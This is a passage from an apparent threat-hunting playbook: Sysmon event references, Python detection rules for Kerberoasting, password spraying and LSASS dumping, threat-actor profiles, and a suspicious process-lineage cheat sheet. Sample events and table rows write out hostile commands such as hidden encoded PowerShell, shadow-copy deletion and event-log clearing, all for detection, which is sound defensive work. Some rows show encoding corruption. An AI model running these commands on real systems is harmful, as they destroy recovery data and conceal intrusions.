3 | Sysmon | Network Connection | Network Activity | A process established a network connection. | PowerShell, certutil, regsvr32 making outbound connections. Connections to public IPs from system-context services. | Image, DestinationIp, DestinationPort, DestinationHostname, User | Info (volume)
5 | Sysmon | Process Terminated | Process Activity | A process terminated. | Pair with EID 1 to compute process lifetime. Very short-lived processes can indicate scripted execution. | Image, ProcessGuid, UtcTime | Info
7 | Sysmon | Image Loaded (DLL) | Process Activity | A DLL was loaded by a process. | Unsigned DLLs in user-writable paths. DLL sideloading patterns (legit signed binary loading malicious DLL from same dir). Volume-heavy — filter aggressively. | Image, ImageLoaded, Hashes, Signed, Signature | Info (very high volume)
8 | Sysmon | CreateRemoteThread | Defense Evasion | A process created a thread in another process (process injection). | Threads injected into lsass.exe = credential theft. Threads injected into svchost/explorer = malware persistence/hiding. Very low FP rate when filtered. | SourceImage, TargetImage, NewThreadId, StartAddress | High
10 | Sysmon | ProcessAccess | Credential Access | A process opened a handle to another process. | Anything opening handles to lsass.exe with GrantedAccess 0x1410 or 0x1010 = LSASS dumping. Known dumpers, but also custom tools. | SourceImage, TargetImage, GrantedAccess, CallTrace | High (when targeting lsass)
11 | Sysmon | FileCreate | File Activity | A file was created. | Executables in unusual paths (Temp, AppData). Ransomware extensions (.locked, .cry, .enc). Known ransom note filenames. | Image, TargetFilename, CreationUtcTime | Info (volume)
12 | Sysmon | RegistryEvent (Object) | Persistence | Registry key/value created or deleted. | Run/RunOnce keys. UAC bypass keys (HKCU\Software\Classes\ms-settings). AppInit_DLLs. | TargetObject, EventType, Image | Medium
13 | Sysmon | RegistryEvent (Value Set) | Persistence | A registry value was set. | Same paths as EID 12 plus the actual values written. Persistence values pointing to user-writable executables. | TargetObject, Details, Image | Medium
15 | Sysmon | FileCreateStreamHash | File Activity | Alternate Data Stream (ADS) was created. Captures Mark of the Web. | Files with Zone.Identifier ADS = downloaded from internet. Combine with EID 1 to track downloaded payload execution. | TargetFilename, Hash, Contents | Low
17 | Sysmon | PipeEvent (Created) | C2 / Lateral | A named pipe was created. | Cobalt Strike default pipe names (msagent_, MSSE-, postex_, status_). Suspicious lateral movement pipes (PSEXESVC). | PipeName, Image | Medium
18 | Sysmon | PipeEvent (Connected) | C2 / Lateral | A client connected to a named pipe. | Same pipe name patterns as EID 17 + visibility into who connected. | PipeName, Image | Medium
22 | Sysmon | DNS Query | Network Activity | A process performed a DNS query. | Queries to known C2 domains. Long subdomain queries (DNS tunneling). Queries to recently-registered domains. | QueryName, QueryStatus, QueryResults, Image | Info (volume)
23 | Sysmon | FileDelete (Archived) | Defense Evasion | A file was deleted; Sysmon archives a copy. | Mass deletion of attacker artifacts. Self-deletion of dropper executables. | Image, TargetFilename, IsExecutable | Medium
25 | Sysmon | Process Tampering | Defense Evasion | Process image tampered (process hollowing/herpaderping). | Any hit is a strong indicator of process injection / hollowing. Low FP rate. | Image, Type | Critical
29 | Sysmon | FileExecutableDetected | Defense Evasion | An executable file was created (Sysmon 15.10+). | PE files dropped to user-writable directories. Use to short-circuit hunting on net-new payloads. | Image, TargetFilename, Hash | Medium
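A few rows of the table turned into executable checks, as an added example (not part of the playbook): 4769 Kerberoasting, 4625 password spray, Sysmon 10 LSASS handle access and 1102/104 log clears, run over constructed Winlogbeat-style event dicts. The 10-distinct-username spray threshold is an assumption; the table gives 10+ only for the brute-force burst.

```python
"""Rule checks for a few rows of the Event ID reference (added example).

Events are dicts of EventData fields as Winlogbeat/Sysmon would ship them,
with hex values kept as strings such as "0x17". Every sample event below is
constructed for the example.
"""
from collections import defaultdict

LSASS_DUMP_MASKS = {0x1410, 0x1010}  # GrantedAccess values from the EID 10 row
SYSMON_CHANNEL = "Microsoft-Windows-Sysmon/Operational"


def _hex(value) -> int:
    """Parse Windows hex strings like "0x40810000" to int."""
    return int(str(value), 16)


def kerberoast_hits(events):
    """4769 with RC4 (0x17) and TicketOptions 0x40810000, per the table row."""
    return [(e["TargetUserName"], e["ServiceName"]) for e in events
            if e["EventID"] == 4769 and e["Channel"] == "Security"
            and _hex(e["TicketEncryptionType"]) == 0x17
            and _hex(e["TicketOptions"]) == 0x40810000]


def password_spray_sources(events, min_users=10):
    """4625 sources failing against many distinct usernames (assumed threshold)."""
    users = defaultdict(set)
    for e in events:
        if e["EventID"] == 4625 and e["Channel"] == "Security":
            users[e["IpAddress"]].add(e["TargetUserName"].lower())
    return {ip: len(u) for ip, u in users.items() if len(u) >= min_users}


def lsass_access_hits(events):
    """Sysmon 10 ProcessAccess on lsass.exe with the table's GrantedAccess masks."""
    return [e["SourceImage"] for e in events
            if e["EventID"] == 10 and e["Channel"] == SYSMON_CHANNEL
            and e["TargetImage"].lower().endswith("\\lsass.exe")
            and _hex(e["GrantedAccess"]) in LSASS_DUMP_MASKS]


def log_clear_events(events):
    """1102 (Security) and 104 (System) are Critical regardless of context."""
    return [e for e in events
            if (e["EventID"] == 1102 and e["Channel"] == "Security")
            or (e["EventID"] == 104 and e["Channel"] == "System")]


def constructed_events():
    """Constructed sample events: one Kerberoast-shaped TGS request, one benign
    AES TGS request, one LSASS dump-shaped handle, one benign LSASS handle, a
    Security log clear, a password spray and a single-account brute force."""
    sec = {"Channel": "Security"}
    sysmon = {"Channel": SYSMON_CHANNEL}
    ev = [
        {**sec, "EventID": 4769, "TargetUserName": "jdoe@CORP.EXAMPLE", "ServiceName": "svc_sql",
         "TicketEncryptionType": "0x17", "TicketOptions": "0x40810000", "IpAddress": "10.1.2.50"},
        {**sec, "EventID": 4769, "TargetUserName": "WS01$@CORP.EXAMPLE", "ServiceName": "krbtgt",
         "TicketEncryptionType": "0x12", "TicketOptions": "0x40810000", "IpAddress": "10.1.2.51"},
        {**sysmon, "EventID": 10, "SourceImage": "C:\\Users\\Public\\dump.exe",
         "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"},
        {**sysmon, "EventID": 10, "SourceImage": "C:\\Windows\\System32\\svchost.exe",
         "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"},
        {**sec, "EventID": 1102, "SubjectUserName": "admin2"},
        {**sec, "EventID": 4624, "TargetUserName": "jdoe", "LogonType": "10"},
    ]
    # spray: one source, 12 different usernames, all bad-password failures
    ev += [{**sec, "EventID": 4625, "IpAddress": "10.1.2.77", "TargetUserName": f"user{i:02d}",
            "Status": "0xC000006D", "SubStatus": "0xC000006A"} for i in range(12)]
    # brute force: one source hammering one account is not a spray by this rule
    ev += [{**sec, "EventID": 4625, "IpAddress": "10.1.2.78", "TargetUserName": "administrator",
            "Status": "0xC000006D", "SubStatus": "0xC000006A"} for _ in range(15)]
    return ev


if __name__ == "__main__":
    ev = constructed_events()
    print("kerberoast:", kerberoast_hits(ev))
    print("spray:", password_spray_sources(ev))
    print("lsass:", lsass_access_hits(ev))
    print("log clears:", [e["EventID"] for e in log_clear_events(ev)])
```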

🎯 Threat Actor Profiles (18 groups)

Profiles of 18 of the most relevant threat actors active today. Includes nation-state APTs (APT29, APT28, APT41, Volt Typhoon, Sandworm, Lazarus, Mustang Panda, Kimsuky, etc.), high-impact cybercrime groups (FIN7, Scattered Spider, Lapsus$, Cl0p), and major ransomware operators (Conti, BlackBasta, ALPHV, LockBit). Each includes targets, notable operations, top techniques, and tooling/IOCs.

APT29 (Cozy Bear / Midnight Blizzard)

Nation-State
Origin: Russia (SVR) Active since: 2008

Targets

Government, diplomatic, defense contractors, technology, healthcare

Notable Operations

SolarWinds supply chain attack (2020), Microsoft password spray (Jan 2024), DNC hack

Top Techniques

T1078 Valid Accounts · T1098 Account Manipulation · T1195 Supply Chain · T1566 Phishing · T1059.001 PowerShell · T1114 Email Collection

Tooling / IOCs

Custom malware: WellMess, WellMail, GoldFinder, Sibot, GoldMax, FoggyWeb. Known for using legitimate cloud services for C2.

APT28 (Fancy Bear / Forest Blizzard)

Nation-State
Origin: Russia (GRU) Active since: 2007

Targets

Government, military, defense contractors, political organizations, journalists

Notable Operations

DNC hack (2016), TV5Monde, German Bundestag, IOC anti-doping leaks, OUTLOOK CVE-2023-23397 mass exploitation

Top Techniques

T1566.001 Spearphishing Attachment · T1190 Exploit Public-Facing · T1110 Brute Force · T1059.003 Windows Cmd · T1003.001 LSASS

Tooling / IOCs

X-Agent, X-Tunnel, Sednit, Sofacy, Zebrocy, ROADSWEEP. CVE-2023-23397 (NTLM relay via Outlook).

APT41 (Wicked Panda / Brass Typhoon)

Nation-State + Cybercrime
Origin: China (MSS) Active since: 2012

Targets

Healthcare, telecom, technology, video games, governments — uniquely both espionage AND financial

Notable Operations

DOJ indicted 5 members in 2020. Compromised 100+ companies. Attended Black Hat conferences in disguise.

Top Techniques

T1190 Exploit Public-Facing · T1505.003 Web Shell · T1027 Obfuscated Files · T1547.001 Run Keys · T1003 OS Credential Dumping

Tooling / IOCs

Custom backdoors: CROSSWALK, SOGU, HIGHNOON, CHINACHOPPER. Known for using stolen game certificates to sign malware.

Volt Typhoon

Nation-State
Origin: China (PLA-affiliated) Active since: 2021

Targets

US critical infrastructure (energy, water, transport, comms) — pre-positioning for conflict

Notable Operations

May 2023 Microsoft/CISA advisory. Living-off-the-land focus, deliberately quiet long-term access. 'Pre-positioning' in Guam infrastructure for potential Taiwan conflict.

Top Techniques

T1133 External Remote Services (Fortinet) · T1059.003 cmd.exe · T1078 Valid Accounts · T1003.003 NTDS · T1090 Proxy (residential proxies)

Tooling / IOCs

Almost no custom malware — pure LOLBin. Uses ntdsutil, Mimikatz, PsExec, Impacket. Compromised SOHO routers for proxy.

Sandworm (Voodoo Bear)

Nation-State
Origin: Russia (GRU 74455) Active since: 2009

Targets

Ukraine (especially), critical infrastructure, election systems, NATO

Notable Operations

BlackEnergy/Industroyer Ukraine grid attacks (2015, 2016), NotPetya ($10B damage), 2018 Olympics, ongoing Ukraine war operations

Top Techniques

T1486 Data Encrypted for Impact · T1561 Disk Wipe · T1190 Exploit Public-Facing · T1059 Command/Scripting · T1485 Data Destruction

Tooling / IOCs

BlackEnergy, Industroyer/CrashOverride, NotPetya, Olympic Destroyer, AcidRain (Viasat), CaddyWiper. Often attribution-confused with Telebots.

Lazarus Group

Nation-State + Financial
Origin: North Korea (RGB) Active since: 2009

Targets

Banks, cryptocurrency exchanges, defense contractors, entertainment, healthcare

Notable Operations

Sony Pictures (2014), Bangladesh Bank SWIFT $81M (2016), WannaCry (2017), Ronin Bridge $620M crypto (2022), 3CX supply chain (2023)

Top Techniques

T1566 Phishing · T1059.001 PowerShell · T1027 Obfuscated · T1486 Encrypted for Impact (WannaCry) · T1574 Hijack Execution Flow

Tooling / IOCs

WannaCry, AppleJeus, FALLCHILL, MATA, BLINDINGCAN, AsymCrypt. Known for fake job interviews delivering malware to crypto/defense engineers.

FIN7 (Carbanak Group)

Cybercrime
Origin: Russia/Ukraine Active since: 2013

Targets

Restaurants, hospitality, gaming (POS systems), retail

Notable Operations

Stole 15M+ payment cards from 100+ US companies. Operated as fake cybersecurity firm 'Combi Security' to recruit unwitting pentesters.

Top Techniques

T1566.001 Spearphishing Attachment · T1059.005 VBS · T1547.001 Run Keys · T1056.002 GUI Input Capture · T1005 Local System Data

Tooling / IOCs

Carbanak, GRIFFON, BABYMETAL, BOOSTWRITE, RDFSNIFFER. Known for elaborate phishing using social engineering of specific individuals.

Scattered Spider (UNC3944, Octo Tempest)

Cybercrime
Origin: US/UK (English-speaking) Active since: 2022

Targets

Telecom, BPO, casinos, technology, financial — anything with help-desk leverage

Notable Operations

MGM Resorts, Caesars, Reddit, Twilio, Microsoft 365 partner ecosystem. Known for SIM-swap and help-desk social engineering.

Top Techniques

T1566.004 Voice Phishing · T1078 Valid Accounts · T1539 Web Cookies · T1199 Trusted Relationship · T1486 Encryption (BlackCat affiliate)

Tooling / IOCs

Uses BlackCat/ALPHV ransomware as affiliate. RMM tools (TeamViewer, AnyDesk, Splashtop). Very fluent English social engineering.

Lapsus$ (Strawberry Tempest)

Cybercrime / Hacktivist
Origin: UK/Brazil Active since: 2021

Targets

Tech giants — for clout. Microsoft, NVIDIA, Samsung, Okta, Uber, Rockstar.

Notable Operations

Compromised Okta authentication provider. Stole GTA VI source code. Most members were teenagers; UK arrests in 2022.

Top Techniques

T1078 Valid Accounts (purchased from infostealers) · T1556 Modify Auth Process · T1199 Trusted Relationship · T1003 LSASS (post-foothold)

Tooling / IOCs

Heavy reliance on infostealer logs (Russian Market, Genesis). MFA fatigue spam to bypass push notifications. Public Telegram channel.

Conti / TrickBot Group

Cybercrime (Ransomware)
Origin: Russia Active since: 2017 (TrickBot), 2020 (Conti)

Targets

Healthcare, government, industrial — opportunistic, big-game hunting

Notable Operations

Costa Rica national emergency (2022), Ireland HSE health system (2021). Internal chats leaked Feb 2022 — 'ContiLeaks' revealed full org structure.

Top Techniques

T1566 Phishing (BazarLoader) · T1059.001 PowerShell (PowerSploit) · T1003.001 LSASS · T1486 Encrypted for Impact

Tooling / IOCs

Conti ransomware, BazarLoader, TrickBot, Cobalt Strike. Group has rebranded multiple times: Ryuk → Conti → BlackBasta → others.

BlackBasta

Cybercrime (Ransomware)
Origin: Russia (Conti spin-off) Active since: 2022

Targets

Industrial, manufacturing, healthcare, government

Notable Operations

Hyundai Europe, Capita UK ($26M ransom), Ascension Health (US). Estimated $107M+ in ransom payments by 2024.

Top Techniques

T1566 Phishing (Qakbot) · T1190 Exploit Public-Facing · T1059.001 PowerShell · T1486 Encrypted for Impact

Tooling / IOCs

BlackBasta ransomware, Qakbot, Brute Ratel, Cobalt Strike. Recently shifted to using Microsoft Teams as initial access (impersonating IT support).

ALPHV / BlackCat

Cybercrime (RaaS)
Origin: Russia (REvil/DarkSide spin-off) Active since: 2021

Targets

Healthcare, financial, government, energy

Notable Operations

Change Healthcare attack (Feb 2024) — paid $22M, then exit-scammed affiliate. MGM Resorts (with Scattered Spider). Reddit, Western Digital.

Top Techniques

T1566 Phishing · T1190 Exploit Public-Facing · T1078 Valid Accounts · T1486 Encrypted for Impact

Tooling / IOCs

ALPHV/BlackCat ransomware (written in Rust — first major ransomware in Rust). Triple extortion: encrypt + leak + DDoS.

LockBit

Cybercrime (RaaS)
Origin: Russia Active since: 2019

Targets

Indiscriminate โ€” manufacturing, retail, professional services, government

Notable Operations

Most prolific ransomware of 2022-2023. UK NHS, ICBC, Boeing. Operation Cronos international takedown in Feb 2024 — but resumed operations within days.

Top Techniques

T1190 Exploit Public-Facing · T1078 Valid Accounts · T1059 Command/Scripting · T1490 Inhibit Recovery · T1486 Encrypted for Impact

Tooling / IOCs

LockBit 2.0, 3.0, Black, Green ransomware variants. Self-spreading SMB worm capability. Run as RaaS with affiliate program.

Cl0p (TA505)

Cybercrime
Origin: Russia Active since: 2014

Targets

Mass exploitation of file transfer products — Accellion FTA, GoAnywhere, MOVEit

Notable Operations

MOVEit Transfer mass exploitation (June 2023) — 2,700+ organizations, 95M+ individuals affected. Currently the most commercially successful extortion campaign.

Top Techniques

T1190 Exploit Public-Facing (zero-days) · T1505.003 Web Shell · T1530 Cloud Storage · T1567 Exfil to Cloud

Tooling / IOCs

Cl0p ransomware (often skipped — pure data extortion). LEMURLOOT web shell. Strategy: zero-day → exfil at scale → name on leak site.

Mustang Panda (Earth Preta, Bronze President)

Nation-State
Origin: China Active since: 2017

Targets

Southeast Asian governments, NGOs, religious organizations (especially Vatican)

Notable Operations

Sustained ASEAN government targeting. Heavy use of weaponized USB drives in physical-air-gap attacks.

Top Techniques

T1566.001 Spearphishing Attachment · T1091 Replication via Removable Media · T1547.009 Shortcut Modification · T1059.001 PowerShell

Tooling / IOCs

PlugX (Korplug), Toneshell, Hodur, MQsTTang. Known for using Vatican-themed lures.

Kimsuky (APT43)

Nation-State
Origin: North Korea (RGB) Active since: 2012

Targets

South Korea, Japan, US — think tanks, foreign policy researchers, journalists, defectors, nuclear policy

Notable Operations

Extensive credential-harvesting campaigns. Very persistent against individual targets — multi-month engagement of single researcher.

Top Techniques

T1566.002 Spearphishing Link · T1539 Steal Web Session Cookie · T1114 Email Collection · T1056.001 Keylogging

Tooling / IOCs

BabyShark, GREASE, FlowerPower. Known for impersonating journalists and academics in initial outreach.

Charming Kitten (APT35)

Nation-State
Origin: Iran (IRGC) Active since: 2014

Targets

Government, journalists, US/UK/Israel critics of Iran, dissidents, academics

Notable Operations

Extensive use of fake personas (e.g., 'Mia Ash' fake recruiter). 2020 US presidential election interference. Microsoft account targeting at scale.

Top Techniques

T1566.002 Spearphishing Link · T1583.001 Acquire Domains · T1078.004 Cloud Accounts · T1539 Web Cookies

Tooling / IOCs

POWERSTATS, MeshAgent, custom infrastructure resembling legitimate sites. Known for fake LinkedIn recruiter personas.

MuddyWater (Mango Sandstorm)

Nation-State
Origin: Iran (MOIS) Active since: 2017

Targets

Telecom, government, energy across Middle East, US allies

Notable Operations

Heavily uses commercial RMM tools (ConnectWise, Atera, AnyDesk) to maintain access — 'living off the land' on the management plane.

Top Techniques

T1566.001 Spearphishing Attachment · T1059.001 PowerShell · T1219 Remote Access Software · T1003.001 LSASS

Tooling / IOCs

POWGOOP, SmallSieve, MORI, PhonyC2. Custom PowerShell frameworks. Pivots to commercial RMM after foothold.

🌳 Parent/Child Process Anomaly Cheat Sheet (44 entries)

Quick-reference table of suspicious process lineages — the parent-spawn-child relationships that indicate compromise. The classic winword.exe → powershell.exe pattern, plus dozens of others.

Parent | Child | Verdict | Context | Tactic
--- | --- | --- | --- | ---
winword.exe | powershell.exe | Highly Suspicious | Office macro launching PowerShell — classic phishing payload chain | Initial Access / Execution
winword.exe | cmd.exe | Highly Suspicious | Office macro spawning shell — phishing payload | Initial Access / Execution
winword.exe | wscript.exe | Highly Suspicious | Office launching Windows Scripting Host — common in macro-dropped JS/VBS payloads | Initial Access / Execution
winword.exe | mshta.exe | Highly Suspicious | Office launching HTA file — script execution evasion | Initial Access / Defense Evasion
winword.exe | rundll32.exe | Highly Suspicious | Office macro using rundll32 to load malicious DLL | Initial Access / Execution
excel.exe | powershell.exe | Highly Suspicious | Excel macro launching PowerShell — same threat as Word | Initial Access / Execution
excel.exe | cmd.exe | Highly Suspicious | Excel macro spawning shell | Initial Access / Execution
outlook.exe | powershell.exe | Highly Suspicious | Outlook spawning PowerShell — typically from malicious attachment auto-execution | Initial Access / Execution
outlook.exe | wscript.exe | Highly Suspicious | Outlook spawning script host — opened malicious attachment | Initial Access / Execution
outlook.exe | rundll32.exe | Highly Suspicious | Outlook spawning rundll32 — DLL-based payload from attachment | Initial Access / Execution
w3wp.exe | cmd.exe | Critical | IIS spawning shell — web shell exploitation, near-certain compromise | Initial Access (Web Exploit)
w3wp.exe | powershell.exe | Critical | IIS spawning PowerShell — web shell | Initial Access (Web Exploit)
w3wp.exe | whoami.exe | Critical | IIS running recon commands — post-exploitation | Discovery
httpd.exe | cmd.exe | Critical | Apache spawning shell — exploit/web shell | Initial Access (Web Exploit)
nginx.exe | cmd.exe | Critical | nginx spawning shell — exploit/web shell | Initial Access (Web Exploit)
tomcat.exe | cmd.exe | Critical | Tomcat spawning shell — Java-based RCE / web shell | Initial Access (Web Exploit)
java.exe | cmd.exe | Critical | Java app spawning shell — Log4Shell-style RCE | Initial Access (Web Exploit)
sqlservr.exe | cmd.exe | Critical | MSSQL xp_cmdshell or similar — DB exploitation | Initial Access / Execution
sqlservr.exe | powershell.exe | Critical | SQL Server launching PowerShell via xp_cmdshell or OLE Automation | Initial Access / Execution
lsass.exe | cmd.exe | Critical | LSASS should never spawn children. Indicates code injection or exploit. | Privilege Escalation
lsass.exe | * | Critical | LSASS should NEVER spawn child processes — any child is suspect | Privilege Escalation
services.exe | cmd.exe | Suspicious | services.exe directly spawning shell — except for a small set of legit services | Persistence / Lateral
services.exe | powershell.exe | Suspicious | services.exe spawning PowerShell — typically a malicious service | Persistence
winlogon.exe | cmd.exe | Critical | winlogon spawning shell — bypass / debugger hijack | Persistence / Priv Esc
powershell.exe | powershell.exe | Suspicious | PowerShell launching PowerShell — sometimes legit, often used to evade logging or restrictions | Execution / Defense Evasion
powershell.exe | cmd.exe | Suspicious | PowerShell spawning cmd — context-dependent. Common in attacker scripts. | Execution
powershell.exe | rundll32.exe | Suspicious | PowerShell using rundll32 — DLL execution / injection | Defense Evasion
rundll32.exe | cmd.exe | Suspicious | rundll32 launching shell — typical of UAC bypass and post-injection workflows | Defense Evasion / Priv Esc
regsvr32.exe | powershell.exe | Highly Suspicious | regsvr32 → powershell — Squiblydoo + post-exploit | Execution / Defense Evasion
mshta.exe | powershell.exe | Highly Suspicious | HTA file launching PowerShell — script-host abuse | Execution
wscript.exe | powershell.exe | Highly Suspicious | VBS/JS launching PowerShell — phishing payload pattern | Execution
cscript.exe โ†’ powershell.exe Highly Suspicious CScript launching PowerShell โ€” same as wscript Execution
explorer.exe โ†’ powershell.exe Context-Dependent User running PowerShell from Explorer (Win+R) is normal. CommandLine flags determine suspicion. Execution (often legit)
explorer.exe โ†’ cmd.exe Context-Dependent User running cmd from Explorer is normal. Investigate the command line. Execution (often legit)
msbuild.exe โ†’ powershell.exe Suspicious MSBuild executing inline tasks calling PowerShell โ€” common attacker LOLBin chain Execution / Defense Evasion
schtasks.exe โ†’ powershell.exe Suspicious Task scheduler running PowerShell scripts โ€” could be legitimate, but verify the task source Persistence / Execution
wmic.exe โ†’ powershell.exe Highly Suspicious WMI process call create launching PowerShell โ€” typical lateral movement / execution Execution / Lateral Movement
psexec.exe โ†’ * Suspicious PsExec is sysadmin tool โ€” legitimate from jump boxes only. From end-user hosts = lateral movement. Lateral Movement
psexesvc.exe โ†’ * Suspicious Server-side of PsExec โ€” confirms lateral inbound. Investigate what spawned next. Lateral Movement
* โ†’ vssadmin.exe Highly Suspicious vssadmin called by anything other than backup software โ€” typically pre-ransomware shadow deletion Impact
* โ†’ wbadmin.exe Highly Suspicious wbadmin delete catalog โ€” pre-ransomware backup destruction Impact
* โ†’ bcdedit.exe Highly Suspicious bcdedit /set recoveryenabled No โ€” pre-ransomware boot options tampering Impact
* โ†’ cipher.exe Suspicious cipher /w (wipe free space) outside scheduled cleanup โ€” anti-forensics Defense Evasion
* โ†’ wevtutil.exe Suspicious wevtutil cl (clear log) โ€” log clearing, pair with Event 1102/104 Defense Evasion
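The lineage table above as executable triage logic, added here as an example and not code from the playbook: it encodes six of the rows (including both wildcard forms and the Context-Dependent Explorer rows), compares on image basenames the way Sysmon Event ID 1 records them, and escalates a Context-Dependent row only on command-line traits, as the table tells you to check. The SUSPICIOUS_FLAGS list and all sample events are constructed.

```python
# Process-lineage triage over Sysmon Event ID 1 (ProcessCreate) records.
# Added example, not the playbook's code: it encodes a subset of the lineage
# table above, resolves the '*' wildcard rows, and handles Context-Dependent
# rows by inspecting the command line, as the table says to do.
import ntpath

# (parent, child) -> (verdict, tactic), verbatim from the table; '*' = any image.
LINEAGE = {
    ("winword.exe", "powershell.exe"): ("Highly Suspicious", "Initial Access / Execution"),
    ("w3wp.exe", "cmd.exe"): ("Critical", "Initial Access (Web Exploit)"),
    ("lsass.exe", "*"): ("Critical", "Privilege Escalation"),
    ("*", "vssadmin.exe"): ("Highly Suspicious", "Impact"),
    ("explorer.exe", "powershell.exe"): ("Context-Dependent", "Execution (often legit)"),
    ("explorer.exe", "cmd.exe"): ("Context-Dependent", "Execution (often legit)"),
}

# Command-line traits that promote a Context-Dependent row to a finding.
# Constructed starter list for this example; baseline it against your own fleet.
SUSPICIOUS_FLAGS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden",
                    "-nop", "bypass", "downloadstring", "iex ")

def image_name(path: str) -> str:
    """Sysmon writes full paths; the table keys on the lower-cased basename."""
    return ntpath.basename(path).lower()

def lookup(parent: str, child: str):
    """Exact pair first, then the wildcard rows; None when the pair is unlisted."""
    for key in ((parent, child), (parent, "*"), ("*", child)):
        if key in LINEAGE:
            return LINEAGE[key]
    return None

def triage(event: dict):
    """Return (verdict, tactic) for one EID 1 record, or None when nothing matched."""
    hit = lookup(image_name(event.get("ParentImage", "")),
                 image_name(event.get("Image", "")))
    if hit is None:
        return None
    verdict, tactic = hit
    if verdict != "Context-Dependent":
        return hit
    cmd = event.get("CommandLine", "").lower()
    if any(flag in cmd for flag in SUSPICIOUS_FLAGS):
        return ("Suspicious", tactic + "; flagged by command line")
    return None  # plain interactive use from Explorer is normal, per the table

# Constructed Sysmon EID 1 records (not real telemetry); paths are typical defaults.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc <base64-placeholder>"},
    {"ParentImage": r"C:\Windows\System32\lsass.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"ParentImage": r"C:\Users\Public\update.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden -enc <base64-placeholder>"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\conhost.exe", "CommandLine": "conhost.exe 0x4"},
]
```

Run `triage()` over each record in `SAMPLE_EVENTS`: the Word, LSASS and vssadmin records return the table's verdicts, the plain Explorer-spawned cmd.exe and the svchost record return None, and the hidden encoded PowerShell from Explorer is promoted to Suspicious.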

โš–๏ธ DoD 8140 / NIST 800-53 / CMMC Compliance Mappings 20 techniques

Maps each MITRE ATT&CK technique to the relevant NIST SP 800-53 Rev 5 security controls, CMMC Level 2 practices, and DoD 8140 work roles. This is a strong cleared-environment differentiator because it connects technical detection skill to compliance language used in DoD environments. In interviews you can demonstrate compliance fluency alongside technical detection skill.

20 of 20
T1078 Valid Accounts
NIST SP 800-53
AC-2 Account ManagementAC-6 Least PrivilegeIA-2 Identification and AuthenticationAU-12 Audit Generation
CMMC Level 2
AC.L2-3.1.1AC.L2-3.1.5IA.L2-3.5.1AU.L2-3.3.1
DoD 8140 Work Roles
541 Vulnerability Assessment Analyst511 Cyber Defense Analyst
T1059 Command and Scripting Interpreter
NIST SP 800-53
SI-3 Malicious Code ProtectionSI-4 System MonitoringCM-7 Least FunctionalityAU-2 Audit Events
CMMC Level 2
SI.L1-3.14.1SI.L1-3.14.2CM.L2-3.4.7AU.L2-3.3.1
DoD 8140 Work Roles
531 Cyber Defense Incident Responder511 Cyber Defense Analyst
T1190 Exploit Public-Facing Application
NIST SP 800-53
SI-2 Flaw RemediationSC-7 Boundary ProtectionSI-4 System MonitoringRA-5 Vulnerability Scanning
CMMC Level 2
SI.L1-3.14.1SC.L1-3.13.1SI.L2-3.14.5RA.L2-3.11.2
DoD 8140 Work Roles
541 Vulnerability Assessment Analyst511 Cyber Defense Analyst
T1566 Phishing
NIST SP 800-53
AT-2 Security Awareness TrainingSI-3 Malicious Code ProtectionSC-44 Detonation Chambers
CMMC Level 2
AT.L2-3.2.1SI.L1-3.14.1SI.L1-3.14.2
DoD 8140 Work Roles
531 Cyber Defense Incident Responder541 Vulnerability Assessment Analyst
T1003 OS Credential Dumping
NIST SP 800-53
IA-5 Authenticator ManagementAC-6 Least PrivilegeSI-4 System MonitoringSC-39 Process Isolation
CMMC Level 2
IA.L2-3.5.7AC.L2-3.1.5SI.L2-3.14.6
DoD 8140 Work Roles
531 Cyber Defense Incident Responder511 Cyber Defense Analyst
T1486 Data Encrypted for Impact
NIST SP 800-53
CP-9 System BackupCP-10 System RecoverySI-4 System MonitoringIR-4 Incident Handling
CMMC Level 2
CP.L2-3.8.9RE.L2-3.13.16SI.L2-3.14.6IR.L2-3.6.1
DoD 8140 Work Roles
531 Cyber Defense Incident Responder532 Cyber Defense Forensics Analyst
T1547.001 Registry Run Keys
NIST SP 800-53
CM-7 Least FunctionalitySI-4 System MonitoringAU-2 Audit Events
CMMC Level 2
CM.L2-3.4.7SI.L2-3.14.6AU.L2-3.3.1
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1053 Scheduled Task/Job
NIST SP 800-53
CM-7 Least FunctionalityAC-6 Least PrivilegeSI-4 System Monitoring
CMMC Level 2
CM.L2-3.4.7AC.L2-3.1.5SI.L2-3.14.6
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1021 Remote Services
NIST SP 800-53
AC-17 Remote AccessIA-2 Identification and AuthenticationSC-7 Boundary Protection
CMMC Level 2
AC.L2-3.1.12AC.L2-3.1.13IA.L2-3.5.3
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1562 Impair Defenses
NIST SP 800-53
SI-4 System MonitoringSI-7 Software/Firmware IntegrityAU-9 Protection of Audit InfoCM-5 Access Restrictions
CMMC Level 2
SI.L2-3.14.6SI.L2-3.14.7AU.L2-3.3.8CM.L2-3.4.5
DoD 8140 Work Roles
531 Cyber Defense Incident Responder
T1027 Obfuscated Files or Information
NIST SP 800-53
SI-3 Malicious Code ProtectionSI-4 System MonitoringCM-7 Least Functionality
CMMC Level 2
SI.L1-3.14.2SI.L2-3.14.6
DoD 8140 Work Roles
511 Cyber Defense Analyst541 Vulnerability Assessment Analyst
T1071 Application Layer Protocol
NIST SP 800-53
SC-7 Boundary ProtectionSI-4 System MonitoringAC-4 Information Flow Enforcement
CMMC Level 2
SC.L1-3.13.1SI.L2-3.14.6AC.L2-3.1.3
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1567 Exfiltration Over Web Service
NIST SP 800-53
